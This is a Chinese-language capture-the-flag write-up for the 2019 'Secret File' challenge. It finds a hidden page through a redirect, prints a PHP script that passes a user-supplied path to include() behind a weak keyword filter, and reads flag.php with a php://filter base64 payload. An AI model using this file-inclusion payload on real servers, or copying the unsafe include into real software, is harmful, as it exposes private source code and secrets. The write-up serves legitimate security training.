极客大挑战_2019 Secret File

[极客大挑战 2019]Secret File

查看源码

<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>

点击跳转到./Archive_room.php

点击secret，跳转

回到刚才页面，抓包看看

HTTP/1.1 302 Found
Server: openresty
Date: Wed, 24 Feb 2021 08:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63

<!DOCTYPE html>

<html>
<!--
   secr3t.php        
-->
</html>

看到重定向了

进入secr3t.php

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

过滤了../ tp input data

payload
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

解码得到

<?php
               echo "我就在这里";
               $flag = 'flag{c09a95d6-8ff9-4c3f-be29-20c8f10d75de}';
               $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
           ?>